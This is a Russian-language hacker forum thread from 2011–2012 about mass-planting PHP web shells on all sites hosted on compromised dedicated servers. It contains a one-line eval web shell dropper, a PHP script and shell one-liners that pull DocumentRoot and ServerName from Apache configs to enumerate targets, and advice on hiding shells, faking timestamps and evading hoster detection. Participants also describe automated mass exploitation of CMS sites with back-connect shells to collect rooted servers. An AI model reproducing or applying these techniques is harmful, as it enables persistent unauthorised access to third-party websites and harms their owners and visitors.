PDA

Просмотр полной версии : Как пролить сайты на дедики шелами рекурсивно?


AloneKiller
21.01.2011, 15:01
Здравствуйте.

Есть дедики freebsd\linux, подскажите пожалуйста способ пролить сайты на них шелами автоматически (скриптом), конфиг апача\нгикса ессно есть, парсить умеею, можно выделить для кадого сайта документ_рут. Но как дальше, если пролить все сайты одинаково, то владельцы сильно зачешутся, есть какие мысли? Ну то что тачить и човнить под каждый сайт шел надо отдельно - это мелочи, сам знаю как делать.

hard
21.01.2011, 16:12
foreach ($document_roots as $dir)
file_put_contents($dir . '/shell.php', '<? eval(stripslashes($_POST['command'])); ?>');


только непонятно зачем тут рекурсия и для чего так палиться перед админами.

snake
21.01.2011, 17:59
непонятно,спилберх.
пролить сайты на дедики шелами рекурсивно?
залить сайты на дедики с шелла и сделать это рекурсивно?
или залить шеллы на сайты,которые на дедике?

Pashkela
21.01.2011, 18:03
2 snake:

))) карочи проифреймить усё)))

Поддерживаю второй пост темы = автоматизация таких вещей исключена, исходя из высоких моральных соображений кидиса, стремящегося быть гуру типо ^_^

snake
21.01.2011, 18:06
автоифреймеров - лопатой греби.удобнее будет в кронтаб засандалить все это дело.Хотя и проживет оно не долго)

AloneKiller
21.01.2011, 20:43
Немного коламбурно написал первый пост. :) В общем, смысл в том, есть дедик, машина с вхостами. Вручную обрабатывать мелкие сайты, типа с тиц 10, нулевки - нудно и сложно. Если бы можно было скриптом пролить на них шелы, получить ссылки в лог, то было б супер.

Pashkela
21.01.2011, 21:18
Если бы можно было скриптом пролить на них шелы, получить ссылки в лог, то было б супер.

ну чо за фуфло, а как же "маскироваться" под окружающую обстановку и прочее? Неужели цель просто залить шелл, пусть и на 1 день? Нету такого в паблике и в привате тоже вряд ли, потому что ни один нормальный хекер такой хней заниматься не будет. Нужен коли сайт - будет добр напрягись децл

"Автоматизация залития шеллов" - про ифрейм слыхал, но такое - это уже вообще ппц ^_^

AloneKiller
21.01.2011, 22:29
Я понимаю, что если класть одинаковый файлик в корень, то жить он будет не долго, вот я и спрашивал как сделать лучше, может модифицировать чего или сгенерить... В целом понял, что врядли найду, думал просто может кто-то писал подобную штуку. Одно дело тицовые и посещаемые ресурсы, а другое дело нулёвки всякие, такие можно б было и проливать. Ведь админы глобальные не следят за каждым ресурсом отдельно. :) Ну и потом если так пролить все сайты, потом можно зайти на каждый шел и перепрятать его, это куда удобнее, чем по ссш, времени просто много уходит.

Pashkela
21.01.2011, 22:36
Да не важно, какой тиц или pr, дело в принципе, тем более стыдно, если админ "нулевого" ресурса тебя попалит

Iceangel_
22.01.2011, 02:18
"Автоматизация залития шеллов" - про ифрейм слыхал, но такое - это уже вообще ппц ^_^

Зря так, довольно удобно порой, к примеру: есть бажный движок, автоматизированно парсишь линки на двиг с гугла, пишешь плоент-автозаливщик, суешь в него эти 100500 линков и полученные на выходе 100499 линков отправляешь в менеджер для этих самых шелленгов, который на выходе дает версии линухов и Glibc(потенциально бажные подсвечиваются), по нажатии на которые автоматически кидается бекконект. В итоге у тебя неплохая база рутнутых серверов, разве это ппц? )

2 AloneKiller
Есть дедики freebsd\linux, подскажите пожалуйста способ пролить сайты на них шелами автоматически (скриптом)
Поддерживаю мнение Пашкелы, вряд ли ты такой скрипт в интернетах найдешь, самому кодить придется, http://php.net/manual/en/ref.ssh2.php пригодится мб.

hard
22.01.2011, 02:38
Зря так, довольно удобно порой, к примеру: есть бажный движок, автоматизированно парсишь линки на двиг с гугла, пишешь плоент-автозаливщик, суешь в него эти 100500 линков и полученные на выходе 100499 линков отправляешь в менеджер для этих самых шелленгов, который на выходе дает версии линухов и Glibc(потенциально бажные подсвечиваются), по нажатии на которые автоматически кидается бекконект. В итоге у тебя неплохая база рутнутых серверов, разве это ппц? )

то что ты описал это тру, но ТС совсем про другое пишет.

asddas
25.01.2011, 16:08
Но как дальше, если пролить все сайты одинаково, то владельцы сильно зачешутся, есть какие мысли? Ну то что тачить и човнить под каждый сайт шел надо отдельно - это мелочи, сам знаю как делать.

Непойму в чём трабл. Если у тебя есть рут и пути, просто парсиш (тот же find подойдёт) все возможные диры для каждого вхоста, потом рендомом из найденного заливаешь.
Например.

Путь: /home/user/www.site.com/
Имеет диры
/home/user/www.site.com/images/
/home/user/www.site.com/images/icons/
/home/user/www.site.com/images/thumbs/
/home/user/www.site.com/include/modules/
/home/user/www.site.com/include/modules/m1/
/home/user/www.site.com/include/modules/m2/
/home/user/www.site.com/include/modules/m3/javascript/
...
и т.д.

В рендом попал /home/user/www.site.com/include/modules/m1/, парсиш файлики в этой дире

constants.php
db_field_definitions.php
db_mysql.php

далее тем же рендомом выбираешь файл, добавляешь к нему что-то типа db_mysql_conf.php


Можно заморочится с глубиной, скажем чтоб не ниже /home/user/www.site.com/dir1/dir2/ было, если в рендом файл попал файл отличный от php заливаешь нужный .htaccess и т.д. т.п. вариантов вообще куча :) Но такие вещи, как правило, долго не живут! И как верно подметили выше, готовых реализаций не найдёшь, а делится вряд ли кто-то будет.

AloneKiller
25.01.2011, 17:26
спасибо за подсказки, вообще лучше всего как я понимаю реализовывать этот скрипт на перле? если отталкиваться от быстродействия и относительной простоты исполнения

AlexSam
17.09.2011, 14:30
можно конечно:
- раскидывать по рандомным директориям, подальше от корня.
для популярных кмс прописать пути (типа /wp-content/plugins/[random])
- не забыть сделать тач
- у шеллов менять рандомно имена/размер
- прочекать шеллы, т.к. записи в конфиге могут быть, а домены уже съехали
не стоит оно того имхо, если у тебя не стопицот серваков

b3
22.11.2011, 17:03
Я для таких целей делал мелкий скриптик на php который парсит папку на наличие файлов *.conf и выдирает из них 2 директивы с именем хоста и путем к DocumentRoot


<?php
set_time_limit(0);
error_reporting(0);

$files = scandir('vhosts.d');

foreach ($files as $file) {
$ext = end(explode('.', $file));
if($ext == 'conf') {

echo 'READ: '.$file.':<br />';
$data = file_get_contents('vhosts.d/'.$file);

if(preg_match('#DocumentRoot "(.*)"#i', $data, $m)) {
$dr = trim($m[1]);
echo 'DocumentRoot: '.$dr.'<br />';
}

if(preg_match('#ServerName(.*)#i', $data, $m)) {
$sn = trim($m[1]);
echo 'ServerName: '.$sn.'<br />';
}
echo '<hr />';

file_put_contents('sn.txt', $sn."\r\n", FILE_APPEND);
file_put_contents('dr-sn.txt', $sn."\r\n".$dr."\r\n===\r\n", FILE_APPEND);

}
}
?>

col
23.11.2011, 00:34
cat *.conf |grep ServerName|grep -v '#'|awk '{print $2}'|sort -u

cat *.conf |grep DocumentRoot|grep -v '#'|awk '{print $2}'|sort -u

b3
23.11.2011, 01:50
А так еще лучше :)

$ cat 50_ba1494_vhost.conf | grep -P '(ServerName|DocumentRoot)' | grep -v '#' | awk '{print $2}'
"/var/www/ba1494/a****a.com.ru/www"
a****a.com.ru
"/var/www/ba1494/a***o.ru/www"
a***o.ru
"/var/www/ba1494/m****m.ru/www"
m****m.ru

AloneKiller
24.03.2012, 05:16
Всех снова приветствую. Хотел поинтересоваться актуальными методами криптовки шеленгов. Можно в icq 676739 или же в пм.

Сам уже изучил и активно использую много технологий, но щас на подходе очередное глобальное проливалово, нужны светлые идеи. В паблик постить не хочу, в лс асю поведаю свои технологии защиты от массового удаления и палева со стороны хостера или веб-мастера при массовом проливе.

Заранее спс за помощь.

lefty
25.03.2012, 18:56
AloneKiller
в тему "критовки" шеленгов.
глянь вот эти пару проектов (не всмысле чтоб прям их юзать, нет, а всмысле почерпнуть может какие-то идеи и заюзать у себя):
http://code.google.com/p/weevely/
https://bechtsoudis.com/webacoo/

несколько док:
https://bechtsoudis.com/hacking/bypass-base64-decoder-detection/
http://www.garage4hackers.com/content/91-webbackdoors-attack-evasion-detection.html
https://bechtsoudis.com/hacking/detect-protect-from-php-backdoor-shells/

посмотри как работают детектолки шелов и юзай недетектируемые методы:
http://ketan.lithiumfox.com/doku.php?id=phpshell_scanner
http://25yearsofprogramming.com/php/findmaliciouscode.htm

AloneKiller
27.03.2012, 21:11
Спасибо огромное, гляну!

//update

нужна помощь, если кто может гляньте темку https://rdot.org/forum/showthread.php?t=2062